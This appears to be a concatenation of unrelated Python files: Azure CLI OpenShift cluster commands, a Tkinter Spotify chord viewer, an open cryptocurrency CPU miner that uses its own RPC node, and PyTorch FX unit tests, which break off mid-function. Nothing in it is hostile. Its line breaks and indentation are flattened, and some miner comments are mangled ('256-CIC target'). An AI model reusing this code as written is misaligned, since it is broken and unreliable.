sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=osamc) result = LongRunningOperation(cmd.cli_ctx)(result) instance = client.get(resource_group_name, name) _ensure_osa_aad(cmd.cli_ctx, aad_client_app_id=osa_aad_identity.client_id, aad_client_app_secret=osa_aad_identity.secret, aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname, name=name, create=create_aad) except CloudError as ex: if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message: raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long if "No registered resource provider found for location" in ex.message: raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long raise ex def openshift_show(cmd, client, resource_group_name, name): logger.warning('Support for existing ARO 3.11 clusters ends June 2022. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long mc = client.get(resource_group_name, name) return _remove_osa_nulls([mc])[0] def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False): logger.warning('Support for existing ARO 3.11 clusters ends June 2022. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long instance = client.get(resource_group_name, name) # TODO: change this approach when we support multiple agent pools. idx = 0 for i in range(len(instance.agent_pool_profiles)): if instance.agent_pool_profiles[i].name.lower() == "compute": idx = i break instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member # null out the AAD profile and add manually the masterAP name because otherwise validation complains instance.master_pool_profile.name = "master" instance.auth_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False): logger.warning('Support for existing ARO 3.11 clusters ends June 2022. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long instance = client.get(resource_group_name, name) workspace_id = _format_workspace_id(workspace_id) monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long instance.monitor_profile = monitor_profile return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False): logger.warning('Support for existing ARO 3.11 clusters ends June 2022. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long instance = client.get(resource_group_name, name) monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long instance.monitor_profile = monitor_profile return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
Runner.py
import threading import time import SpotiAuth import ChordScraper from tkinter import * import codecs def backend_script(): retrieved_song = "none" while True: token = SpotiAuth.token_response2 song, artist, is_playing = SpotiAuth.SpotiAuth.currently_playing(token) if is_playing: if song != retrieved_song: lyrics_to_get = f'{song} - {artist}' html_source_text, retrieved_song = ChordScraper.ChordScraper.get_chords(song, artist) # Show the retrieved lyrics on the GUI with open('song_chords.txt', 'w+', encoding='utf-16') as lyrics_file: lyrics_file.write(f'\n{lyrics_to_get}\n\n{html_source_text}') txt = Text(root, height=40, width=64, background='#0066CC', foreground='white', wrap=WORD, font='Courier') scrollb = Scrollbar(root, command=txt.yview) txt['yscrollcommand'] = scrollb.set txt.grid(row=0, rowspan=3, columnspan=4, sticky='news') with codecs.open('song_chords.txt', 'r', 'utf-16') as f: txt.insert(INSERT, f.read()) txt.config(state=DISABLED) root.update() else: pass else: # Print to the GUI 'Spotify is currently not playing any tracks.' with open('song_lyrics.txt', 'w+', encoding='utf-16') as lyrics_file: lyrics_file.write(f'Spotify is currently not playing any tracks.') root.update() time.sleep(10) # Thread 1: Establishing and Maintaining Spotify OAuth Connection token_response = SpotiAuth.SpotiAuth.initializer() first_start = True threading.Thread(target=SpotiAuth.SpotiAuth.recursive_reinit, args=[token_response, first_start], daemon=True).start() # Creating the Window for the GUI root = Tk() root.title("Chords Plugin for Spotify") root.configure(background='#0066CC') root.minsize(420, 220) root.maxsize(880, 920) root.rowconfigure([0, 1, 2], minsize=60, weight=1) root.columnconfigure([0, 1, 2], minsize=75, weight=1) root.rowconfigure([3], minsize=60, weight=0) btn_quit = Button(root, text="Quit", width=12, bg='#0080FF', fg='white', command=root.destroy) \ .grid(row=3, column=1, sticky='s', padx=5, pady=5) # Thread 2: Backend Script threading.Thread(target=backend_script, daemon=True).start() # Thread 3 (Main Thread): Start GUI root.mainloop()
pyminer.py
#!/usr/bin/python # # Copyright (c) 2011 The CICcoin developers # Distributed under the MIT/X11 software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # import time import json import pprint import hashlib import struct import re import base64 import httplib import sys from multiprocessing import Process ERR_SLEEP = 15 MAX_NONCE = 1000000L settings = {} pp = pprint.PrettyPrinter(indent=4) class CICcoinRPC: OBJID = 1 def __init__(self, host, port, username, password): authpair = "%s:%s" % (username, password) self.authhdr = "Basic %s" % (base64.b64encode(authpair)) self.conn = httplib.HTTPConnection(host, port, False, 30) def rpc(self, method, params=None): self.OBJID += 1 obj = { 'version' : '1.1', 'method' : method, 'id' : self.OBJID } if params is None: obj['params'] = [] else: obj['params'] = params self.conn.request('POST', '/', json.dumps(obj), { 'Authorization' : self.authhdr, 'Content-type' : 'application/json' }) resp = self.conn.getresponse() if resp is None: print "JSON-RPC: no response" return None body = resp.read() resp_obj = json.loads(body) if resp_obj is None: print "JSON-RPC: cannot JSON-decode body" return None if 'error' in resp_obj and resp_obj['error'] != None: return resp_obj['error'] if 'result' not in resp_obj: print "JSON-RPC: no result in object" return None return resp_obj['result'] def getblockcount(self): return self.rpc('getblockcount') def getwork(self, data=None): return self.rpc('getwork', data) def uint32(x): return x & 0xffffffffL def bytereverse(x): return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) | (((x) >> 8) & 0x0000ff00) | ((x) >> 24) )) def bufreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): word = struct.unpack('@I', in_buf[i:i+4])[0] out_words.append(struct.pack('@I', bytereverse(word))) return ''.join(out_words) def wordreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): out_words.append(in_buf[i:i+4]) out_words.reverse() return ''.join(out_words) class Miner: def __init__(self, id): self.id = id self.max_nonce = MAX_NONCE def work(self, datastr, targetstr): # decode work data hex string to binary static_data = datastr.decode('hex') static_data = bufreverse(static_data) # the first 76b of 80b do not change blk_hdr = static_data[:76] # decode 256-CIC target value targetbin = targetstr.decode('hex') targetbin = targetbin[::-1] # byte-swap and dword-swap targetbin_str = targetbin.encode('hex') target = long(targetbin_str, 16) # pre-hash first 76b of block header static_hash = hashlib.sha256() static_hash.update(blk_hdr) for nonce in xrange(self.max_nonce): # encode 32-CIC nonce value nonce_bin = struct.pack("<I", nonce) # hash final 4b, the nonce value hash1_o = static_hash.copy() hash1_o.update(nonce_bin) hash1 = hash1_o.digest() # sha256 hash of sha256 hash hash_o = hashlib.sha256() hash_o.update(hash1) hash = hash_o.digest() # quick test for winning solution: high 32 CICs zero? if hash[-4:] != '\0\0\0\0': continue # convert binary hash to 256-CIC Python long hash = bufreverse(hash) hash = wordreverse(hash) hash_str = hash.encode('hex') l = long(hash_str, 16) # proof-of-work test: hash < target if l < target: print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,) return (nonce + 1, nonce_bin) else: print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,) # return (nonce + 1, nonce_bin) return (nonce + 1, None) def submit_work(self, rpc, original_data, nonce_bin): nonce_bin = bufreverse(nonce_bin) nonce = nonce_bin.encode('hex') solution = original_data[:152] + nonce + original_data[160:256] param_arr = [ solution ] result = rpc.getwork(param_arr) print time.asctime(), "--> Upstream RPC result:", result def iterate(self, rpc): work = rpc.getwork() if work is None: time.sleep(ERR_SLEEP) return if 'data' not in work or 'target' not in work: time.sleep(ERR_SLEEP) return time_start = time.time() (hashes_done, nonce_bin) = self.work(work['data'], work['target']) time_end = time.time() time_diff = time_end - time_start self.max_nonce = long( (hashes_done * settings['scantime']) / time_diff) if self.max_nonce > 0xfffffffaL: self.max_nonce = 0xfffffffaL if settings['hashmeter']: print "HashMeter(%d): %d hashes, %.2f Khash/sec" % ( self.id, hashes_done, (hashes_done / 1000.0) / time_diff) if nonce_bin is not None: self.submit_work(rpc, work['data'], nonce_bin) def loop(self): rpc = CICcoinRPC(settings['host'], settings['port'], settings['rpcuser'], settings['rpcpass']) if rpc is None: return while True: self.iterate(rpc) def miner_thread(id): miner = Miner(id) miner.loop() if __name__ == '__main__': if len(sys.argv) != 2: print "Usage: pyminer.py CONFIG-FILE" sys.exit(1) f = open(sys.argv[1]) for line in f: # skip comment lines m = re.search('^\s*#', line) if m: continue # parse key=value lines m = re.search('^(\w+)\s*=\s*(\S.*)$', line) if m is None: continue settings[m.group(1)] = m.group(2) f.close() if 'host' not in settings: settings['host'] = '127.0.0.1' if 'port' not in settings: settings['port'] = 8332 if 'threads' not in settings: settings['threads'] = 1 if 'hashmeter' not in settings: settings['hashmeter'] = 0 if 'scantime' not in settings: settings['scantime'] = 30L if 'rpcuser' not in settings or 'rpcpass' not in settings: print "Missing username and/or password in cfg file" sys.exit(1) settings['port'] = int(settings['port']) settings['threads'] = int(settings['threads']) settings['hashmeter'] = int(settings['hashmeter']) settings['scantime'] = long(settings['scantime']) thr_list = [] for thr_id in range(settings['threads']): p = Process(target=miner_thread, args=(thr_id,)) p.start() thr_list.append(p) time.sleep(1) # stagger threads print settings['threads'], "mining threads started" print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port']) try: for thr_proc in thr_list: thr_proc.join() except KeyboardInterrupt: pass print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
test_fx.py
import builtins import contextlib import copy import functools import inspect import math import numbers import operator import os import pickle import sys import torch import traceback import typing import types import warnings import unittest from math import sqrt from torch.multiprocessing import Process from torch.testing import FileCheck from torch.testing._internal.common_methods_invocations import op_db from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests import torch.utils._pytree as pytree import torch.fx._pytree as fx_pytree from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH import torch._C._fx from torch.fx.node import Target, Argument from torch.fx.passes import shape_prop from torch.fx.immutable_collections import immutable_dict, immutable_list from torch.fx.experimental.rewriter import RewritingTracer from torch.fx.operator_schemas import get_signature_for_torch_op from copy import deepcopy from collections import namedtuple from torch.fx.proxy import TraceError from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401 from fx.test_dce_pass import TestDCE # noqa: F401 from fx.test_fx_const_fold import TestConstFold # noqa: F401 from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import AnnotationsTest # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import TypeCheckerTest # noqa: F401 from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union from torch.testing._internal.common_utils import ( IS_FBCODE, IS_MACOS, IS_WINDOWS, TEST_WITH_ROCM, find_library_location, run_tests, ) from torch.testing._internal.jit_utils import JitTestCase from fx.named_tup import MyNamedTup try: from torchvision import models as torchvision_models HAS_TORCHVISION = True except ImportError: HAS_TORCHVISION = False skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision") class SimpleTest(torch.nn.Module): def forward(self, x): return torch.relu(x + 3.0) def a_non_torch_leaf(a, b): return a + b # Used for test_autowrap_function. Autowrapped functions need to be global def fx_int(x: float) -> int: return int(x) def fx_int_x2(x: float) -> int: return int(x) * 2 # used in test_pytree. It's all the way out here because pickling a GraphModule # that uses Point errors out if Point is local to the function Point = namedtuple('Point', ['x', 'y']) # Test wrap() passing both a function name as well as a function # directly def a_lifted_leaf(a, b): return a[0] + a[1] + b wrap('a_lifted_leaf') # Test wrapping twice doesn't break anything wrap('a_lifted_leaf') def a_lifted_leaf2(a, b): return a[0] + a[1] + b wrap(a_lifted_leaf2) wrap('len') wrap('getattr') @wrap def wrapped_via_decorator(a): return a + 1 wrap('wrapped_with_submodule') def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d): return batchnorm1d(x) real_wrapped_via_decorator = wrapped_via_decorator real_a_lifed_leaf = a_lifted_leaf real_a_lifed_leaf2 = a_lifted_leaf2 _sqrt = sqrt wrap('wrapper_fn') def wrapper_fn(x): return torch.foo(x) class Pair(NamedTuple): x : torch.Tensor y : torch.Tensor # for testing pytrees class Foo(object): # noqa: B209 def __init__(self, a, b): self.a = a self.b = b class TestFX(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS): lib_file_path = find_library_location('libtorchbind_test.so') torch.ops.load_library(str(lib_file_path)) def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None): """Check that an nn.Module's results match the GraphModule version for a given set of args/kwargs. """ kwargs = kwargs if kwargs else {} ref_outs = m(*args, **kwargs) gm = symbolic_trace(m) gm.graph.lint() test_outs = gm(*args, **kwargs) self.assertEqual(ref_outs, test_outs) def test_graph_module(self): class MySub(torch.nn.Module): def __init__(self): super().__init__() self.w = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.w + x class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.lin = torch.nn.Linear(4, 3) self.sub_mod = MySub() self.w = torch.nn.Parameter(torch.rand(3)) def forward(self, A, B, c): t = torch.sigmoid(A) + self.lin(c) return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3)) m = MyModule() gm = symbolic_trace(m) ms = torch.jit.script(gm) class M2(torch.nn.Module): def forward(self, A): m, idx = torch.max(A, 0) return m + 1, idx + 1 m2 = M2() gm2 = symbolic_trace(m2) class T(torch.nn.Module): def forward(self, A, b=4, *args, c=5, **kwargs): x = A + 1 + args[0] + kwargs['3'] return x t = T() symbolic_trace(t) # test for issue described at https://github.com/pytorch/pytorch/issues/63883 class M3(torch.nn.Module): def forward(self, x): return torch.relu(x) m3 = M3() gm3 = symbolic_trace(m3) new_instance = gm3.__new__(type(gm3)) new_instance.__init__(gm3, gm3.graph) x = torch.randn(5, 3) torch.testing.assert_allclose(new_instance(x), torch.relu(x)) def test_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) x, y = torch.rand(1), torch.rand(1) self.assertEqual(torch.sin(x + y), gm(x, y)) def test_args_kwargs(self): class T(torch.nn.Module): def forward(self, *args, **kwargs): x = args[0] + kwargs['foo'] return x t = T() self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_args_kwargs_no_self(self): class T(torch.nn.Module): def forward(*args, **kwargs): # noqa: B902 self = args[0] return torch.relu(args[1]) t = T() with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'): self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_fx_shifts(self): class MyModule(torch.nn.Module): def forward(self, x): return x << 3, x >> 3 input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_dict(self): class MyDictMod(torch.nn.Module): def forward(self, d): return d['3'].relu(), {'4' : d['3'].neg()} input_dict = {'3': torch.rand(3, 4)} m = MyDictMod() self.checkGraphModule(m, (input_dict,)) def test_matmul_tracing(self): const = torch.randn(3) def matmul_f(x): return x @ const mod = symbolic_trace(matmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), matmul_f(inp)) def rmatmul_f(x): return const @ x mod = symbolic_trace(rmatmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), rmatmul_f(inp)) def test_disallow_override(self): # Custom delegate to disallow in-place tensor operations class NoMutableCallTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: name = target if isinstance(target, str) else torch.typename(target) if name[-1] == '_': raise RuntimeError('In-place operations are not supported') return super().create_node(kind, target, args, kwargs, name) # Test method class MyInplaceMod(torch.nn.Module): def forward(self, x): x.add_(3.0) return x m = MyInplaceMod() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m) # Test free function class MyInplaceMod2(torch.nn.Module): def forward(self, x): torch.log_(x) return x m2 = MyInplaceMod2() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m2) # Test symbolic node as an arg class MyInplaceMod3(torch.nn.Module): def forward(self, x): y = torch.ones(3, 4) y.add_(x) return x m3 = MyInplaceMod3() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m3) def test_leaf_module(self): # Custom delegate to make it so that there are no leaf modules, everything # should get traced through class NoLeafModulesTracer(Tracer): def is_leaf_module(self, m, qualname): return False class MyReluMod(torch.nn.Module): def __init__(self): super().__init__() self.relu = torch.nn.ReLU() def forward(self, x): return self.relu(x) mrm = MyReluMod() sym = NoLeafModulesTracer().trace(mrm) for node in sym.nodes: self.assertNotEqual(node.op, 'call_module') sym.lint() def test_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf2', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_wrapped_via_decorator(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(m).transform() self.assertIn('wrapped_via_decorator', transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) m = symbolic_trace(M()) self.assertIn("wrapped_with_submodule", m.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), m(input)) def test_wrapped_retrace(self): def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) retraced = symbolic_trace(m) self.assertIn('wrapped_via_decorator', retraced.code) self.assertEqual(retraced(0), 1) def test_graph_edit_with_proxy(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) gm.graph.lint() self.assertEqual(gm(3, 4), 14) def test_graph_unique_names(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) seen_names : Set[str] = set() for node in gm.graph.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_stack_traces(self): class M(torch.nn.Module): def forward(self, a, b): return a + b tracer = torch.fx.Tracer() tracer.record_stack_traces = True graph = tracer.trace(M()) for node in graph.nodes: if node.op == 'output': continue self.assertTrue(node.stack_trace is not None) assert 'test_fx.py' in node.stack_trace def test_graph_unique_names_manual(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1') c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) graph2 = torch.fx.Graph() val_map : Dict[Node, Node] = {} graph2.graph_copy(graph, val_map) seen_names : Set[str] = set() for node in graph2.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_unpack(self): class M(torch.nn.Module): def forward(self, a, b): c, d = a return c + d + b a = (torch.rand(1), torch.rand(1)) b = torch.rand(1) m = M() self.checkGraphModule(m, (a, b)) def test_native_callable(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: raise unittest.SkipTest("non-portable load_library call used in test") # This test exercises the case where we use FX to translate from Python # code to some native callable object # # For the purposes of testing, we use ElementwiseInterpreter defined # in test_custom_class.cpp. # # We test that we can # 1) Construct a native callable from FX IR # 2) Construct a drop-in replacement module that delegates to the # native callable rather than the original code # 3) Run both the original code and native callable wrapper with # equivalent results # 4) TorchScript compile the native callable wrapper and confirm # equivalent results with the reference # 5) TorchScript serialize and deserialize the native callable # and confirm equivalent results with the reference # We use this simple Module as a reference computation class MySimpleMod(torch.nn.Module): def forward(self, x): return 3.0 * x + x msm = MySimpleMod() # This is what a lowering pass might look like: a function that takes # a valid nn.Module, symbolically traces it, lowers the Module to some # representation, and wraps that representation up into another # nn.Module instance that handles dispatch to the compiled/lowered code. def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module: # ===== Stage 1: Symbolic trace the module ===== mod = symbolic_trace(orig_mod) # ===== Stage 2: Lower GraphModule representation to the C++ # interpreter's instruction format ====== instructions = [] constant_idx = 0 constants = {} fn_input_names = [] target_to_name = { operator.add : "add", operator.mul : "mul" } output_node : Optional[Node] = None # For each instruction, create a triple # (instruction_name : str, inputs : List[str], output : str) # to feed into the C++ interpreter for n in mod.graph.nodes: target, args, out_name = n.target, n.args, n.name assert len(n.kwargs) == 0, "kwargs currently not supported" if n.op == 'placeholder': # Placeholders specify function argument names. Save these # for later when we generate the wrapper GraphModule fn_input_names.append(target) elif n.op == 'call_function': assert target in target_to_name, "Unsupported call target " + target arg_names = [] for arg in args: if not isinstance(arg, Node): # Pull out constants. These constants will later be # fed to the interpreter C++ object via add_constant() arg_name = f'constant_{constant_idx}' constants[arg_name] = torch.tensor( [arg] if isinstance(arg, numbers.Number) else arg) arg_names.append(arg_name) constant_idx += 1 else: arg_names.append(arg.name) instructions.append((target_to_name[target], arg_names, out_name)) elif n.op == 'output': if output_node is not None: raise RuntimeError('Multiple output nodes!') output_node = n else: raise RuntimeError('Unsupported opcode ' + n.op) interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter() # Load constants for k, v in constants.items(): interpreter.add_constant(k, v) # Specify names for positional input arguments interpreter.set_input_names(fn_input_names) # Load instructions interpreter.set_instructions(instructions) # Specify name for single output assert isinstance(output_node.args[0], torch.fx.Node) interpreter.set_output_name(output_node.args[0].name) # ===== Stage 3: Create a wrapper GraphModule around the interpreter ===== class WrapperModule(torch.nn.Module): def __init__(self, interpreter): super().__init__() self.interpreter = interpreter wrapper = WrapperModule(interpreter) # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter # 3) Returns the speficied return value # FIXME: The following code could be greatly simplified by symbolic_trace'ing # the wrapper with a Tracer that considers the Wrapper instance a root # module, however, I can't get `__call__` exposed on TorchBind classes # without it messing up Python `hasattr` for some reason. More digging # into CPython's implementation of hasattr is probably in order... graph = torch.fx.Graph() # Add placeholders for fn inputs placeholder_nodes = [] for name in fn_input_names: placeholder_nodes.append(graph.create_node('placeholder', name)) # Get the interpreter object interpreter_node = graph.create_node('get_attr', 'interpreter') # Add a node to call the interpreter instance output_node = graph.create_node( op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes)) # Register output graph.output(output_node) graph.lint() # Return final GraphModule!!! return GraphModule(wrapper, graph) # Lower GraphModule to C++ interpreter lowered = lower_to_elementwise_interpreter(msm) # Compare correctness with original module x = torch.rand(3, 4) ref_out = msm(x) test_out = lowered(x) torch.testing.assert_close(test_out, ref_out) # Test TorchScript compilation scripted_lowered = torch.jit.script(lowered) script_out = scripted_lowered(x) torch.testing.assert_close(script_out, ref_out) # Test TorchScript ser/de import_copy = self.getExportImportCopy(scripted_lowered) imported_out = import_copy(x) torch.testing.assert_close(imported_out, ref_out) def test_reserved_getattr(self): """Ensure that we do not name any nodes with a reserved builtin like `getattr`""" class M(torch.nn.Module): def forward(self, a): return a.foo.bar.baz m = M() m_g = symbolic_trace(m) m_g.graph.lint() for node in m_g.graph.nodes: self.assertTrue(node.name != "getattr") def test_node_tagging(self): class TaggingTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: n = super().create_node(kind, target, args, kwargs, name) n.tag = 'foo' return n class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = TaggingTracer().trace(m) g.lint() for n in g.nodes: self.assertTrue(hasattr(n, 'tag')) self.assertEqual(n.tag, 'foo') def test_tensor_attribute(self): class TensorAttribute(torch.nn.Module): def __init__(self): super().__init__() self.tensor = torch.rand(3, 4) def forward(self, x): return torch.nn.functional.linear(x, self.tensor) ta = TensorAttribute() traced = symbolic_trace(ta) traced(torch.rand(4, 4)) class WrapperForQualname(torch.nn.Module): def __init__(self): super().__init__() self.ta = TensorAttribute() def forward(self, x): return torch.nn.functional.linear(x, self.ta.tensor) wfq = WrapperForQualname() traced2 = symbolic_trace(wfq) traced2.graph.lint() traced2(torch.rand(4, 4)) def test_symbolic_trace_sequential(self): class Simple(torch.nn.Module): def forward(self, x): return torch.neg(x) seq = torch.nn.Sequential( Simple(), Simple(), Simple() ) traced = symbolic_trace(seq) traced.graph.lint() x = torch.rand(3, 4) self.assertEqual(traced(x), seq(x)) def test_tensor_constant(self): class ConstTensor(torch.nn.Module): def forward(self, x): return torch.nn.functional.linear(x, torch.zeros(3, 4)) ct = ConstTensor() traced = symbolic_trace(ct) traced.graph.lint() traced(torch.rand(4, 4)) def test_pickle_graphmodule(self): class Nested(torch.nn.Module): def __init__(self): super().__init__() self.st = torch.nn.Linear(4, 4) def forward(self, x): return self.st(x) n = Nested() traced = symbolic_trace(n) traced.graph.lint() pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() x = torch.rand(3, 4) self.assertEqual(loaded(x), traced(x)) def test_pickle_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) loaded.graph.lint() x, y = torch.rand(1), torch.rand(1) self.assertEqual(loaded(x, y), gm(x, y)) def test_all_input_nodes(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.placeholder('x') b : torch.fx.Node = graph.call_module('linear_mod', args=(a,)) c : torch.fx.Node = graph.get_attr('y_attr') d : torch.fx.Node = graph.call_function(operator.add, args=(b, c)) e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0)) graph.output(e) graph.lint() self.assertEqual(b.all_input_nodes, [a]) self.assertEqual(c.all_input_nodes, []) self.assertEqual(d.all_input_nodes, [b, c]) self.assertEqual(e.all_input_nodes, [d]) def test_deepcopy_graphmodule_with_transform(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() def transform(traced): new_graph = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_value = new_graph.graph_copy(traced.graph, val_map) relu_out = new_graph.create_node( op='call_method', target='neg', args=(output_value,), kwargs={}) new_graph.output(relu_out) return GraphModule(traced, new_graph) transformed = transform(traced) transformed.graph.lint() copied = copy.deepcopy(transformed) self.assertNotEqual(id(type(transformed)), id(type(copied))) x = torch.randn(3, 4) self.assertEqual(copied(x), transformed(x)) def test_deepcopy_with_submods_params(self): class Bar(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) def forward(self, x): return torch.relu(x) + self.param class Baz(torch.nn.Module): def 